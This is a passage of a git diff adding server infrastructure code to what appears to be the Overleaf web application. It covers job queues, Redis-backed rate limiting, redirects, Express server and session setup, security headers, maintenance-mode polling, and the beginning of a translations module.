+const MAX_COMPLETED_JOBS_RETAINED = 10000 +const MAX_FAILED_JOBS_RETAINED = 50000 +const MAX_FAILED_JOBS_RETAINED_ANALYTICS = 3000000 + +const QUEUES_JOB_OPTIONS = { + 'analytics-events': { + removeOnFail: MAX_FAILED_JOBS_RETAINED_ANALYTICS, + }, + 'analytics-editing-sessions': { + removeOnFail: MAX_FAILED_JOBS_RETAINED_ANALYTICS, + }, + 'analytics-account-mapping': { + removeOnFail: MAX_FAILED_JOBS_RETAINED_ANALYTICS, + }, + 'analytics-user-properties': { + removeOnFail: MAX_FAILED_JOBS_RETAINED_ANALYTICS, + }, + 'refresh-features': { + removeOnFail: MAX_FAILED_JOBS_RETAINED, + attempts: 3, + }, + 'emails-onboarding': { + removeOnFail: MAX_FAILED_JOBS_RETAINED, + }, + 'post-registration-analytics': { + removeOnFail: MAX_FAILED_JOBS_RETAINED_ANALYTICS, + }, + 'scheduled-jobs': { + removeOnFail: MAX_FAILED_JOBS_RETAINED, + attempts: 1, + }, + 'confirm-institution-domain': { + removeOnFail: MAX_FAILED_JOBS_RETAINED, + attempts: 3, + }, + + 'group-sso-reminder': { + removeOnFail: MAX_FAILED_JOBS_RETAINED, + attempts: 3, + }, +} + +const QUEUE_OPTIONS = { + 'confirm-institution-domain': { + limiter: { + max: 1, + duration: 60 * 1000, + }, + }, +} + +const ANALYTICS_QUEUES = [ + 'analytics-account-mapping', + 'analytics-events', + 'analytics-editing-sessions', + 'analytics-user-properties', + 'post-registration-analytics', +] + +const queues = {} + +function getQueue(queueName) { + if (!Features.hasFeature('saas')) { + // Disable bull queue handling for Server Pro/CE by providing a stub interface. + return { + async add() {}, + process() {}, + } + } + + if (!queues[queueName]) { + const redisOptions = ANALYTICS_QUEUES.includes(queueName) + ? Settings.redis.analyticsQueues + : Settings.redis.queues + const queueOptions = QUEUE_OPTIONS[queueName] || {} + const jobOptions = QUEUES_JOB_OPTIONS[queueName] || {} + queues[queueName] = new Queue(queueName, { + // this configuration is duplicated in /services/analytics/app/js/Queues.js + // and needs to be manually kept in sync whenever modified + redis: redisOptions, + ...queueOptions, + defaultJobOptions: { + removeOnComplete: MAX_COMPLETED_JOBS_RETAINED, + attempts: 11, + backoff: { + type: 'exponential', + delay: 3000, + }, + ...jobOptions, + }, + }) + + // Disconnect from redis eventually. + addConnectionDrainer(`bull queue ${queueName}`, async () => { + await queues[queueName].disconnect() + }) + } + return queues[queueName] +} + +async function createScheduledJob(queueName, { name, data, options }, delay) { + await getQueue('scheduled-jobs').add( + { queueName, name, data, options }, + { + delay, + } + ) +} + +module.exports = { + getQueue, + createScheduledJob, +} diff --git a/services/web/app/src/infrastructure/RateLimiter.js b/services/web/app/src/infrastructure/RateLimiter.js new file mode 100644 index 0000000..6ce80b2 --- /dev/null +++ b/services/web/app/src/infrastructure/RateLimiter.js @@ -0,0 +1,144 @@ +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const RedisWrapper = require('./RedisWrapper') +const RateLimiterFlexible = require('rate-limiter-flexible') +const OError = require('@overleaf/o-error') + +const rclient = RedisWrapper.client('ratelimiter') + +/** + * Wrapper over the RateLimiterRedis class + */ +class RateLimiter { + #opts + + /** + * Create a rate limiter. + * + * @param name {string} The name that identifies this rate limiter. Different + * rate limiters must have different names. 
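+   * (For example, the shared limiters at the bottom of this file use the
+   * names 'open-project' and 'overleaf-login'.)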
+   * @param opts {object} Options to pass to RateLimiterRedis
+   *
+   * Some useful options:
+   *
+   *   points - number of points that can be consumed over the given duration
+   *            (default: 4)
+   *   subnetPoints - number of points that can be consumed over the given
+   *                  duration across a sub-network. This should only be used
+   *                  for ip-based rate limits.
+   *   duration - duration of the fixed window in seconds (default: 1)
+   *   blockDuration - additional seconds to block after all points are consumed
+   *                   (default: 0)
+   */
+  constructor(name, opts = {}) {
+    this.name = name
+    this.#opts = Object.assign({}, opts)
+    this._rateLimiter = new RateLimiterFlexible.RateLimiterRedis({
+      ...opts,
+      keyPrefix: `rate-limit:${name}`,
+      storeClient: rclient,
+    })
+    if (opts.subnetPoints && !Settings.rateLimit?.subnetRateLimiterDisabled) {
+      this._subnetRateLimiter = new RateLimiterFlexible.RateLimiterRedis({
+        ...opts,
+        points: opts.subnetPoints,
+        keyPrefix: `rate-limit:${name}`,
+        storeClient: rclient,
+      })
+    }
+  }
+
+  // Readonly access to the options, useful for aligning rate-limits.
+  getOptions() {
+    return Object.assign({}, this.#opts)
+  }
+
+  async consume(key, points = 1, options = { method: 'unknown' }) {
+    if (Settings.disableRateLimits) {
+      // Return a fake result in case it's used somewhere
+      return {
+        msBeforeNext: 0,
+        remainingPoints: 100,
+        consumedPoints: 0,
+        isFirstInDuration: false,
+      }
+    }
+
+    await this.consumeForRateLimiter(this._rateLimiter, key, options, points)
+
+    if (options.method === 'ip' && this._subnetRateLimiter) {
+      const subnetKey = this.getSubnetKeyFromIp(key)
+      await this.consumeForRateLimiter(
+        this._subnetRateLimiter,
+        subnetKey,
+        options,
+        points,
+        'ip-subnet'
+      )
+    }
+  }
+
+  async consumeForRateLimiter(rateLimiter, key, options, points, method) {
+    try {
+      const res = await rateLimiter.consume(key, points, options)
+      return res
+    } catch (err) {
+      if (err instanceof Error) {
+        throw err
+      } else {
+        // Only log the first time we exceed the rate limit for a given key and
+        // duration. This happens when the previous amount of consumed points
+        // was below the threshold.
+        if (err.consumedPoints - points <= rateLimiter.points) {
+          logger.warn({ path: this.name, key }, 'rate limit exceeded')
+        }
+        Metrics.inc('rate-limit-hit', 1, {
+          path: this.name,
+          method: method || options.method,
+        })
+        throw err
+      }
+    }
+  }
+
+  getSubnetKeyFromIp(ip) {
+    if (!/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/.test(ip)) {
+      throw new OError(
+        'Cannot generate subnet key as the ip address is not of the expected format.',
+        { ip }
+      )
+    }
+
+    return ip.split('.').slice(0, 3).join('.')
+  }
+
+  async delete(key) {
+    return await this._rateLimiter.delete(key)
+  }
+}
+
+/*
+ * Shared rate limiters
+ */
+
+const openProjectRateLimiter = new RateLimiter('open-project', {
+  points: 15,
+  duration: 60,
+})
+
+// Keep in sync with the can-skip-captcha options.
+const overleafLoginRateLimiter = new RateLimiter(
+  'overleaf-login',
+  Settings.rateLimit?.login?.ip || {
+    points: 20,
+    subnetPoints: 200,
+    duration: 60,
+  }
+)
+
+module.exports = {
+  RateLimiter,
+  openProjectRateLimiter,
+  overleafLoginRateLimiter,
+}
diff --git a/services/web/app/src/infrastructure/RedirectManager.js b/services/web/app/src/infrastructure/RedirectManager.js
new file mode 100644
index 0000000..2a11af8
--- /dev/null
+++ b/services/web/app/src/infrastructure/RedirectManager.js
@@ -0,0 +1,83 @@
+/* eslint-disable
+    max-len,
+    no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let RedirectManager +const settings = require('@overleaf/settings') +const { URL } = require('url') + +module.exports = RedirectManager = { + apply(webRouter) { + return (() => { + const result = [] + for (const redirectUrl in settings.redirects) { + const target = settings.redirects[redirectUrl] + result.push( + Array.from(target.methods || ['get']).map(method => + webRouter[method]( + redirectUrl, + RedirectManager.createRedirect(target) + ) + ) + ) + } + return result + })() + }, + + createRedirect(target) { + return function (req, res, next) { + let url + if ( + (req.headers != null ? req.headers['x-skip-redirects'] : undefined) != + null + ) { + return next() + } + let code = 302 + if (typeof target === 'string') { + url = target + } else { + if (req.method !== 'GET') { + code = 307 + } + + if (typeof target.url === 'function') { + url = target.url(req.params) + if (!url) { + return next() + } + } else { + ;({ url } = target) + } + + if (target.baseUrl != null) { + url = `${target.baseUrl}${url}` + } + } + return res.redirect(code, url + getQueryString(req)) + } + }, +} + +// Naively get the query params string. Stringifying the req.query object may +// have differences between Express and Rails, so safer to just pass the raw +// string +function getQueryString(req) { + const { search } = new URL(req.originalUrl, settings.siteUrl) + if (search) { + return search + } else { + return '' + } +} diff --git a/services/web/app/src/infrastructure/RedisWrapper.js b/services/web/app/src/infrastructure/RedisWrapper.js new file mode 100644 index 0000000..fecb00a --- /dev/null +++ b/services/web/app/src/infrastructure/RedisWrapper.js @@ -0,0 +1,29 @@ +const Settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const { addConnectionDrainer } = require('./GracefulShutdown') + +if ( + typeof global.beforeEach === 'function' && + process.argv.join(' ').match(/unit/) +) { + throw new Error( + 'It looks like unit tests are running, but you are connecting to Redis. Missing a stub?' + ) +} + +// A per-feature interface to Redis, +// looks up the feature in `settings.redis` +// and returns an appropriate client. +// Necessary because we don't want to migrate web over +// to redis-cluster all at once. +module.exports = { + // feature = 'websessions' | 'ratelimiter' | ... 
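+  //
+  // e.g. (a real call from this codebase, see RateLimiter.js):
+  //
+  //   const rclient = RedisWrapper.client('ratelimiter')
+  //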
client(feature) {
+    const redisFeatureSettings = Settings.redis[feature] || Settings.redis.web
+    const client = redis.createClient(redisFeatureSettings)
+    addConnectionDrainer(`redis ${feature}`, async () => {
+      await client.disconnect()
+    })
+    return client
+  },
+}
diff --git a/services/web/app/src/infrastructure/RequestContentTypeDetection.js b/services/web/app/src/infrastructure/RequestContentTypeDetection.js
new file mode 100644
index 0000000..6c8c587
--- /dev/null
+++ b/services/web/app/src/infrastructure/RequestContentTypeDetection.js
@@ -0,0 +1,5 @@
+module.exports = {
+  acceptsJson(req) {
+    return req.accepts(['html', 'json']) === 'json'
+  },
+}
diff --git a/services/web/app/src/infrastructure/Response.js b/services/web/app/src/infrastructure/Response.js
new file mode 100644
index 0000000..607dbae
--- /dev/null
+++ b/services/web/app/src/infrastructure/Response.js
@@ -0,0 +1,48 @@
+function csvAttachment(res, body, filename) {
+  if (!filename || !filename.endsWith('.csv')) {
+    throw new Error('filename must end with .csv')
+  }
+  // res.attachment sets both content-type and content-disposition headers.
+  res.attachment(filename)
+  res.setHeader('X-Content-Type-Options', 'nosniff')
+  res.send(body)
+}
+
+function preparePlainTextResponse(res) {
+  res.setHeader('X-Content-Type-Options', 'nosniff')
+  res.contentType('text/plain; charset=utf-8')
+}
+
+function plainTextResponse(res, body) {
+  preparePlainTextResponse(res)
+  res.send(body)
+}
+
+function xmlResponse(res, body) {
+  res.setHeader('X-Content-Type-Options', 'nosniff')
+  res.contentType('application/xml; charset=utf-8')
+  res.send(body)
+}
+
+function prepareZipAttachment(res, filename) {
+  if (!filename || !filename.endsWith('.zip')) {
+    throw new Error('filename must end with .zip')
+  }
+  // res.attachment sets both content-type and content-disposition headers.
+  res.attachment(filename)
+  res.setHeader('X-Content-Type-Options', 'nosniff')
+}
+
+function zipAttachment(res, body, filename) {
+  prepareZipAttachment(res, filename)
+  res.send(body)
+}
+
+module.exports = {
+  csvAttachment,
+  plainTextResponse,
+  preparePlainTextResponse,
+  prepareZipAttachment,
+  xmlResponse,
+  zipAttachment,
+}
diff --git a/services/web/app/src/infrastructure/ServeStaticWrapper.mjs b/services/web/app/src/infrastructure/ServeStaticWrapper.mjs
new file mode 100644
index 0000000..fba667e
--- /dev/null
+++ b/services/web/app/src/infrastructure/ServeStaticWrapper.mjs
@@ -0,0 +1,34 @@
+import express from 'express'
+import { plainTextResponse } from './Response.js'
+
+/*
+  This wrapper is implemented specifically to handle "Premature Close" errors.
+  These errors occur when the client cancels a request while static assets are
+  being loaded. This issue is beyond our control, and it can result in
+  unnecessary log noise. Therefore, this wrapper is added to handle such errors.
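+
+  In practice the behaviour below is: the error is demoted to a debug-level
+  log entry, and if no response headers have been sent yet the request is
+  answered with a plain-text "400 Premature close" instead of propagating
+  the error.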
+*/ +function serveStaticWrapper(root, options) { + const serveStatic = express.static(root, options) + return (req, res, next) => { + serveStatic(req, res, error => { + if (!error) { + return next() + } + + if (error.code !== 'ERR_STREAM_PREMATURE_CLOSE') { + return next(error) + } + + req.logger.addFields({ err: error }) + req.logger.setLevel('debug') + if (res.headersSent) { + res.end() + } else { + res.status(400) + plainTextResponse(res, 'Premature close') + } + }) + } +} + +export default serveStaticWrapper diff --git a/services/web/app/src/infrastructure/Server.mjs b/services/web/app/src/infrastructure/Server.mjs new file mode 100644 index 0000000..3c7fd75 --- /dev/null +++ b/services/web/app/src/infrastructure/Server.mjs @@ -0,0 +1,377 @@ +import express from 'express' +import Settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' +import Validation from './Validation.js' +import csp from './CSP.js' +import Router from '../router.mjs' +import helmet from 'helmet' +import UserSessionsRedis from '../Features/User/UserSessionsRedis.js' +import Csrf from './Csrf.js' +import HttpPermissionsPolicyMiddleware from './HttpPermissionsPolicy.js' +import SessionAutostartMiddleware from './SessionAutostartMiddleware.js' +import AnalyticsManager from '../Features/Analytics/AnalyticsManager.js' +import session from 'express-session' +import CookieMetrics from './CookieMetrics.js' +import CustomSessionStore from './CustomSessionStore.js' +import bodyParser from './BodyParserWrapper.js' +import methodOverride from 'method-override' +import cookieParser from 'cookie-parser' +import bearerTokenMiddleware from 'express-bearer-token' +import passport from 'passport' +import { Strategy as LocalStrategy } from 'passport-local' +import ReferalConnect from '../Features/Referal/ReferalConnect.mjs' +import RedirectManager from './RedirectManager.js' +import translations from './Translations.js' +import Views from './Views.js' +import Features from './Features.js' +import ErrorController from '../Features/Errors/ErrorController.js' +import HttpErrorHandler from '../Features/Errors/HttpErrorHandler.js' +import UserSessionsManager from '../Features/User/UserSessionsManager.js' +import AuthenticationController from '../Features/Authentication/AuthenticationController.js' +import SessionManager from '../Features/Authentication/SessionManager.js' +import { hasAdminAccess } from '../Features/Helpers/AdminAuthorizationHelper.js' +import Modules from './Modules.js' +import expressLocals from './ExpressLocals.js' +import noCache from 'nocache' +import os from 'node:os' +import http from 'node:http' +import { fileURLToPath } from 'node:url' +import serveStaticWrapper from './ServeStaticWrapper.mjs' + +const sessionsRedisClient = UserSessionsRedis.client() + +const oneDayInMilliseconds = 86400000 + +const STATIC_CACHE_AGE = Settings.cacheStaticAssets + ? oneDayInMilliseconds * 365 + : 0 + +// Init the session store +const sessionStore = new CustomSessionStore({ client: sessionsRedisClient }) + +const app = express() + +const webRouter = express.Router() +const privateApiRouter = express.Router() +const publicApiRouter = express.Router() + +if (Settings.behindProxy) { + app.set('trust proxy', Settings.trustedProxyIps || true) + /** + * Handle the X-Original-Forwarded-For header. + * + * The nginx ingress sends us the contents of X-Forwarded-For it received in + * X-Original-Forwarded-For. 
Express expects all proxy IPs to be in a comma + * separated list in X-Forwarded-For. + */ + app.use((req, res, next) => { + if ( + req.headers['x-original-forwarded-for'] && + req.headers['x-forwarded-for'] + ) { + req.headers['x-forwarded-for'] = + req.headers['x-original-forwarded-for'] + + ', ' + + req.headers['x-forwarded-for'] + } + next() + }) +} + +// `req.ip` is a getter on the underlying socket. +// The socket details are freed as the connection is dropped -- aka aborted. +// Hence `req.ip` may read `undefined` upon connection drop. +// A couple of places require a valid IP at all times. Cache it! +const ORIGINAL_REQ_IP = Object.getOwnPropertyDescriptor( + Object.getPrototypeOf(app.request), + 'ip' +).get +Object.defineProperty(app.request, 'ip', { + configurable: true, + enumerable: true, + get() { + const ip = ORIGINAL_REQ_IP.call(this) + // Shadow the prototype level getter with a property on the instance. + // Any future access on `req.ip` will get served by the instance property. + Object.defineProperty(this, 'ip', { value: ip }) + return ip + }, +}) + +app.use((req, res, next) => { + if (req.destroyed) { + // Request has been aborted already. + return + } + // Implicitly cache the ip, see above. + if (!req.ip) { + // Critical connection details are missing. + return + } + next() +}) + +if (Settings.exposeHostname) { + const HOSTNAME = os.hostname() + app.use((req, res, next) => { + res.setHeader('X-Served-By', HOSTNAME) + next() + }) +} + +webRouter.use( + serveStaticWrapper( + fileURLToPath(new URL('../../../public', import.meta.url)), + { + maxAge: STATIC_CACHE_AGE, + setHeaders: csp.removeCSPHeaders, + } + ) +) + +app.set('views', fileURLToPath(new URL('../../views', import.meta.url))) +app.set('view engine', 'pug') + +if (Settings.enabledServices.includes('web')) { + if (app.get('env') !== 'development') { + logger.debug('enabling view cache for production or acceptance tests') + app.enable('view cache') + } + if (Settings.precompilePugTemplatesAtBootTime) { + logger.debug('precompiling views for web in production environment') + Views.precompileViews(app) + } + Modules.loadViewIncludes(app) +} + +app.use(metrics.http.monitor(logger)) + +await Modules.applyMiddleware(app, 'appMiddleware') +app.use(bodyParser.urlencoded({ extended: true, limit: '2mb' })) +app.use(bodyParser.json({ limit: Settings.max_json_request_size })) +app.use(methodOverride()) +// add explicit name for telemetry +app.use(bearerTokenMiddleware()) + +if (Settings.blockCrossOriginRequests) { + app.use(Csrf.blockCrossOriginRequests()) +} + +if (Settings.useHttpPermissionsPolicy) { + const httpPermissionsPolicy = new HttpPermissionsPolicyMiddleware( + Settings.httpPermissions + ) + logger.debug('adding permissions policy config', Settings.httpPermissions) + webRouter.use(httpPermissionsPolicy.middleware) +} + +RedirectManager.apply(webRouter) + +if (!Settings.security.sessionSecret) { + throw new Error('No SESSION_SECRET provided.') +} + +const sessionSecrets = [ + Settings.security.sessionSecret, + Settings.security.sessionSecretUpcoming, + Settings.security.sessionSecretFallback, +].filter(Boolean) + +webRouter.use(cookieParser(sessionSecrets)) +webRouter.use(CookieMetrics.middleware) +SessionAutostartMiddleware.applyInitialMiddleware(webRouter) +await Modules.applyMiddleware(webRouter, 'sessionMiddleware', { + store: sessionStore, +}) +webRouter.use( + session({ + resave: false, + saveUninitialized: false, + secret: sessionSecrets, + proxy: Settings.behindProxy, + cookie: { + domain: 
Settings.cookieDomain, + maxAge: Settings.cookieSessionLength, // in milliseconds, see https://github.com/expressjs/session#cookiemaxage + secure: Settings.secureCookie, + sameSite: Settings.sameSiteCookie, + }, + store: sessionStore, + key: Settings.cookieName, + rolling: Settings.cookieRollingSession === true, + }) +) + +if (Features.hasFeature('saas')) { + webRouter.use(AnalyticsManager.analyticsIdMiddleware) +} + +// passport +webRouter.use(passport.initialize()) +webRouter.use(passport.session()) + +passport.use( + new LocalStrategy( + { + passReqToCallback: true, + usernameField: 'email', + passwordField: 'password', + }, + AuthenticationController.doPassportLogin + ) +) +passport.serializeUser(AuthenticationController.serializeUser) +passport.deserializeUser(AuthenticationController.deserializeUser) + +Modules.hooks.fire('passportSetup', passport, err => { + if (err != null) { + logger.err({ err }, 'error setting up passport in modules') + } +}) + +await Modules.applyNonCsrfRouter(webRouter, privateApiRouter, publicApiRouter) + +webRouter.csrf = new Csrf() +webRouter.use(webRouter.csrf.middleware) +webRouter.use(translations.i18nMiddleware) +webRouter.use(translations.setLangBasedOnDomainMiddleware) + +if (Settings.cookieRollingSession) { + // Measure expiry from last request, not last login + webRouter.use((req, res, next) => { + if (!req.session.noSessionCallback) { + req.session.touch() + if (SessionManager.isUserLoggedIn(req.session)) { + UserSessionsManager.touch( + SessionManager.getSessionUser(req.session), + err => { + if (err) { + logger.err({ err }, 'error extending user session') + } + } + ) + } + } + next() + }) +} + +webRouter.use(ReferalConnect.use) +expressLocals(webRouter, privateApiRouter, publicApiRouter) +webRouter.use(SessionAutostartMiddleware.invokeCallbackMiddleware) + +webRouter.use(function checkIfSiteClosed(req, res, next) { + if (Settings.siteIsOpen) { + next() + } else if (hasAdminAccess(SessionManager.getSessionUser(req.session))) { + next() + } else { + HttpErrorHandler.maintenance(req, res) + } +}) + +webRouter.use(function checkIfEditorClosed(req, res, next) { + if (Settings.editorIsOpen) { + next() + } else if (req.url.indexOf('/admin') === 0) { + next() + } else { + HttpErrorHandler.maintenance(req, res) + } +}) + +webRouter.use(AuthenticationController.validateAdmin) + +// add security headers using Helmet +const noCacheMiddleware = noCache() +webRouter.use((req, res, next) => { + const isProjectPage = /^\/project\/[a-f0-9]{24}$/.test(req.path) + if (isProjectPage) { + // always set no-cache headers on a project page, as it could be an anonymous token viewer + return noCacheMiddleware(req, res, next) + } + + const isProjectFile = /^\/project\/[a-f0-9]{24}\/file\/[a-f0-9]{24}$/.test( + req.path + ) + if (isProjectFile) { + // don't set no-cache headers on a project file, as it's immutable and can be cached (privately) + return next() + } + const isProjectBlob = /^\/project\/[a-f0-9]{24}\/blob\/[a-f0-9]{40}$/.test( + req.path + ) + if (isProjectBlob) { + // don't set no-cache headers on a project blobs, as they are immutable and can be cached (privately) + return next() + } + + const isWikiContent = /^\/learn(-scripts)?(\/|$)/i.test(req.path) + if (isWikiContent) { + // don't set no-cache headers on wiki content, as it's immutable and can be cached (publicly) + return next() + } + + const isLoggedIn = SessionManager.isUserLoggedIn(req.session) + if (isLoggedIn) { + // always set no-cache headers for authenticated users (apart from project files, 
above) + return noCacheMiddleware(req, res, next) + } + + // allow other responses (anonymous users, except for project pages) to be cached + return next() +}) + +webRouter.use( + helmet({ + // note that more headers are added by default + dnsPrefetchControl: false, + referrerPolicy: { policy: 'origin-when-cross-origin' }, + hsts: false, + // Disabled because it's impractical to include every resource via CORS or + // with the magic CORP header + crossOriginEmbedderPolicy: false, + // We need to be able to share the context of some popups. For example, + // when Recurly opens Paypal in a popup. + crossOriginOpenerPolicy: { policy: 'same-origin-allow-popups' }, + // Disabled because it's not a security header and has possibly-unwanted + // effects + originAgentCluster: false, + // We have custom handling for CSP below, so Helmet's default is disabled + contentSecurityPolicy: false, + }) +) + +// add CSP header to HTML-rendering routes, if enabled +if (Settings.csp && Settings.csp.enabled) { + logger.debug('adding CSP header to rendered routes', Settings.csp) + app.use(csp(Settings.csp)) +} + +logger.debug('creating HTTP server'.yellow) +const server = http.createServer(app) + +// provide settings for separate web and api processes +if (Settings.enabledServices.includes('api')) { + logger.debug({}, 'providing api router') + app.use(privateApiRouter) + app.use(Validation.errorMiddleware) + app.use(ErrorController.handleApiError) +} + +if (Settings.enabledServices.includes('web')) { + logger.debug({}, 'providing web router') + app.use(publicApiRouter) // public API goes with web router for public access + app.use(Validation.errorMiddleware) + app.use(ErrorController.handleApiError) + app.use(webRouter) + app.use(Validation.errorMiddleware) + app.use(ErrorController.handleError) +} + +metrics.injectMetricsRoute(webRouter) +metrics.injectMetricsRoute(privateApiRouter) + +await Router.initialize(webRouter, privateApiRouter, publicApiRouter) + +export default { app, server } diff --git a/services/web/app/src/infrastructure/SessionAutostartMiddleware.js b/services/web/app/src/infrastructure/SessionAutostartMiddleware.js new file mode 100644 index 0000000..eaf6f58 --- /dev/null +++ b/services/web/app/src/infrastructure/SessionAutostartMiddleware.js @@ -0,0 +1,128 @@ +const Settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') + +const botUserAgents = [ + 'kube-probe', + 'GoogleStackdriverMonitoring', + 'GoogleHC', + 'Googlebot', + 'bingbot', + 'facebookexternal', +].map(agent => { + return agent.toLowerCase() +}) +// SessionAutostartMiddleware provides a mechanism to force certain routes not +// to get an automatic session where they don't have one already. This allows us +// to work around issues where we might overwrite a user's login cookie with one +// that is hidden by a `SameSite` setting. +// +// When registering a route with disableSessionAutostartForRoute, a callback +// should be provided that handles the case that a session is not available. 
+// This will be called as a standard middleware with (req, res, next) - calling
+// next will continue and set up a session as normal, otherwise the app can
+// perform a different operation instead
+
+class SessionAutostartMiddleware {
+  constructor() {
+    this.middleware = this.middleware.bind(this)
+    this._cookieName = Settings.cookieName
+    this._noAutostartCallbacks = new Map()
+  }
+
+  static applyInitialMiddleware(router) {
+    const middleware = new SessionAutostartMiddleware()
+    router.sessionAutostartMiddleware = middleware
+    router.use(middleware.middleware)
+  }
+
+  disableSessionAutostartForRoute(route, method, callback) {
+    if (typeof callback !== 'function') {
+      throw new Error('callback not provided when disabling session autostart')
+    }
+
+    if (!this._noAutostartCallbacks[route]) {
+      this._noAutostartCallbacks[route] = new Map()
+    }
+
+    this._noAutostartCallbacks[route][method] = callback
+  }
+
+  applyDefaultPostGatewayForRoute(route) {
+    this.disableSessionAutostartForRoute(
+      route,
+      'POST',
+      SessionAutostartMiddleware.genericPostGatewayMiddleware
+    )
+  }
+
+  autostartCallbackForRequest(req) {
+    return (
+      this._noAutostartCallbacks[req.path] &&
+      this._noAutostartCallbacks[req.path][req.method]
+    )
+  }
+
+  reqIsBot(req) {
+    const agent = (req.headers['user-agent'] || '').toLowerCase()
+
+    const foundMatch = botUserAgents.find(botAgent => {
+      return agent.includes(botAgent)
+    })
+
+    if (foundMatch) {
+      return true
+    } else {
+      return false
+    }
+  }
+
+  middleware(req, _res, next) {
+    if (
+      !req.signedCookies[this._cookieName] &&
+      req.query?.autostartSession !== 'true'
+    ) {
+      const callback = this.autostartCallbackForRequest(req)
+      if (callback) {
+        req.session = {
+          noSessionCallback: callback,
+        }
+      } else if (this.reqIsBot(req)) {
+        req.session = {
+          noSessionCallback: (_req, _res, next) => {
+            next()
+          },
+          // prevent exception for bot accesses to /project (which requires
+          // login and regenerates session)
+          regenerate: cb => cb(),
+        }
+      }
+    }
+    next()
+  }
+
+  static invokeCallbackMiddleware(req, res, next) {
+    if (req.session.noSessionCallback) {
+      return req.session.noSessionCallback(req, res, next)
+    }
+    next()
+  }
+
+  static genericPostGatewayMiddleware(req, res, next) {
+    if (req.method !== 'POST') {
+      return next(
+        new OError('post gateway invoked for non-POST request', {
+          path: req.path,
+          method: req.method,
+        })
+      )
+    }
+
+    if (req.body.viaGateway) {
+      return next()
+    }
+
+    res.render('general/post-gateway', { form_data: req.body })
+  }
+}
+
+module.exports = SessionAutostartMiddleware
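A brief usage sketch for the class above (editor's illustration, not part of the commit; the `/launchpad` route and the login redirect are hypothetical stand-ins):

    const SessionAutostartMiddleware = require('./SessionAutostartMiddleware')

    function setupRouter(router) {
      // Install the middleware that decides whether a session may autostart.
      SessionAutostartMiddleware.applyInitialMiddleware(router)

      // POSTs without a session get the generic gateway page, which re-submits
      // the form with `viaGateway` set once a session can be started.
      router.sessionAutostartMiddleware.applyDefaultPostGatewayForRoute(
        '/launchpad' // hypothetical route
      )

      // GETs provide their own fallback when no session exists.
      router.sessionAutostartMiddleware.disableSessionAutostartForRoute(
        '/launchpad',
        'GET',
        (req, res, next) => res.redirect('/login')
      )
    }

diff --git a/services/web/app/src/infrastructure/SiteAdminHandler.js b/services/web/app/src/infrastructure/SiteAdminHandler.js
new file mode 100644
index 0000000..cd6df2a
--- /dev/null
+++ b/services/web/app/src/infrastructure/SiteAdminHandler.js
@@ -0,0 +1,92 @@
+const logger = require('@overleaf/logger')
+const settings = require('@overleaf/settings')
+const fs = require('fs')
+const {
+  addOptionalCleanupHandlerAfterDrainingConnections,
+  addRequiredCleanupHandlerBeforeDrainingConnections,
+} = require('./GracefulShutdown')
+const Features = require('./Features')
+const UserHandler = require('../Features/User/UserHandler')
+const metrics = require('@overleaf/metrics')
+
+// Monitor a site maintenance file (e.g. /etc/site_status) periodically and
+// close the site if the file contents contain the string "closed".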
+ +const STATUS_FILE_CHECK_INTERVAL = 5000 +const statusFile = settings.siteMaintenanceFile + +function updateSiteMaintenanceStatus(fileContent) { + const isClosed = !settings.siteIsOpen + const shouldBeClosed = fileContent && fileContent.indexOf('closed') >= 0 + if (!isClosed && shouldBeClosed) { + settings.siteIsOpen = false + logger.warn({ fileContent }, 'putting site into maintenance mode') + } else if (isClosed && !shouldBeClosed) { + settings.siteIsOpen = true + logger.warn({ fileContent }, 'taking site out of maintenance mode') + } +} + +function pollSiteMaintenanceFile() { + fs.readFile(statusFile, { encoding: 'utf8' }, (err, fileContent) => { + if (err) { + logger.error( + { file: statusFile, fsErr: err }, + 'error reading site maintenance file' + ) + return + } + updateSiteMaintenanceStatus(fileContent) + }) +} + +function checkSiteMaintenanceFileSync() { + // crash on start up if file does not exist + const content = fs.readFileSync(statusFile, { encoding: 'utf8' }) + updateSiteMaintenanceStatus(content) +} + +const SERVER_PRO_ACTIVE_USERS_METRIC_INTERVAL = + settings.activeUserMetricInterval || 1000 * 60 * 60 + +function publishActiveUsersMetric() { + UserHandler.promises + .countActiveUsers() + .then(activeUserCount => metrics.gauge('num_active_users', activeUserCount)) + .catch(error => logger.error({ error }, 'error counting active users')) +} + +module.exports = { + initialise() { + if (settings.enabledServices.includes('web') && statusFile) { + logger.debug( + { statusFile, interval: STATUS_FILE_CHECK_INTERVAL }, + 'monitoring site maintenance file' + ) + checkSiteMaintenanceFileSync() // perform an initial synchronous check at start up + const intervalHandle = setInterval( + pollSiteMaintenanceFile, + STATUS_FILE_CHECK_INTERVAL + ) // continue checking periodically + addOptionalCleanupHandlerAfterDrainingConnections( + 'poll site maintenance file', + () => { + clearInterval(intervalHandle) + } + ) + } + if (!Features.hasFeature('saas')) { + publishActiveUsersMetric() + const intervalHandle = setInterval( + publishActiveUsersMetric, + SERVER_PRO_ACTIVE_USERS_METRIC_INTERVAL + ) + addRequiredCleanupHandlerBeforeDrainingConnections( + 'publish server pro usage metrics', + () => { + clearInterval(intervalHandle) + } + ) + } + }, +} diff --git a/services/web/app/src/infrastructure/Translations.js b/services/web/app/src/infrastructure/Translations.js new file mode 100644 index 0000000..9c2cc79 --- /dev/null +++ b/services/web/app/src/infrastructure/Translations.js @@ -0,0 +1,147 @@ +const i18n = require('i18next') +const fsBackend = require('i18next-fs-backend') +const middleware = require('i18next-http-middleware') +const path = require('path') +const Settings = require('@overleaf/settings') +const { URL } = require('url') +const pug = require('pug-runtime') +const logger = require('@overleaf/logger') +const SafeHTMLSubstitution = require('../Features/Helpers/SafeHTMLSubstitution') + +const fallbackLanguageCode = Settings.i18n.defaultLng || 'en' +const availableLanguageCodes = [] +const availableHosts = new Map() +const subdomainConfigs = new Map() +const I18N_HTML_INJECTIONS = new Set() + +Object.values(Settings.i18n.subdomainLang || 